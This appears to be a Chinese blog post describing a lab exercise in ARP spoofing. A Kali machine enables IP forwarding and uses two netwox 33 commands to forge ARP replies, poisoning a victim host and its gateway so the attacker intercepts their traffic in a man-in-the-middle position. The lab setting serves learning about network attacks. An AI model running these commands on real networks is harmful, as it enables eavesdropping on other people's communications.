HCIE(1)——ARP欺骗实验模拟

it2023-11-13  79

一、实验拓扑

二、实验要求 网关发送给主机A的消息会被攻击者接受,再转发给主机A;同理。主机A发送给网关的消息也会被攻击者接收,再转发给网关。相当于,攻击者B成为了主机A和网关C通信的**“中间者”**。

三、实验环境准备 kali-Linux虚拟机 ensp实验环境

四、实验步骤 1、配置相应的IP地址 受害者主机A:172.24.8.130/24 网关:172.24.8.2/24 攻击者kali:172.24.8.129/24 外网主机:10.1.1.100/24 2、首先测试一下各个设备之间的连通性 受害者主机A与攻击者kali之间: 受害者主机A与外网主机B之间: 3、使用arp -a查看一下受害者A上和路由器上的的arp缓存列表

4、在kali上进行攻击 1)开启网卡转发功能 vim /etc/sysctl.conf //编辑sysctl.conf Net.ipv4.ip_forward = 1 //设置为1 Sysctl -p /etc/sysctl.conf //立即生效不需要重启 Cat /etc/sys/net/ipv4/ipv4_forward //查看值是否为1,为1表示修改完成,为0表示没有修改。 开启了网卡转发功能后,受害者主机发送到目标主机的数据包会经过攻击者转发出去,这样攻击者就可以监听他们之间的数据了。 同时还需要在kali上写一条到10.1.1.100的静态路由,保证kali可以到外网

sudo route add -net 10.1.1.0 netmask 255.255.255.0 gw 172.24.8.2

2)使用netwox 33 号工具,对主机A收到的网关的ARPREP报文修改;

sudo netwox 33 -d Eth0 -a 00:0C:29:93:FA:E2 -b 54:89:98:08:60:D4 -c 2054 -e 2 -f 00:0C:29:93:FA:E2 -g 172.24.8.2 -h 54:89:98:08:60:D4 -i 172.24.8.130 sudo netwox 33 -d Eth0 -a 00:0C:29:93:FA:E2 -b 00:e0:fc:66:4a:b3 -c 2054 -e 2 -f 00:0C:29:93:FA:E2 -g 172.24.8.130 -h 00:e0:fc:66:4a:b3 -i 172.24.8.2

3)查看受害者主机A的ARP缓存列表,可以看到网关的MAC地址已经变成了攻击者的MAC 查看路由器上缓存列表 5、进行抓包测试 可以在攻击者kali上面的Eth0上抓包。 可以观察到他们之间的通信数据会经过攻击者。

最新回复(0)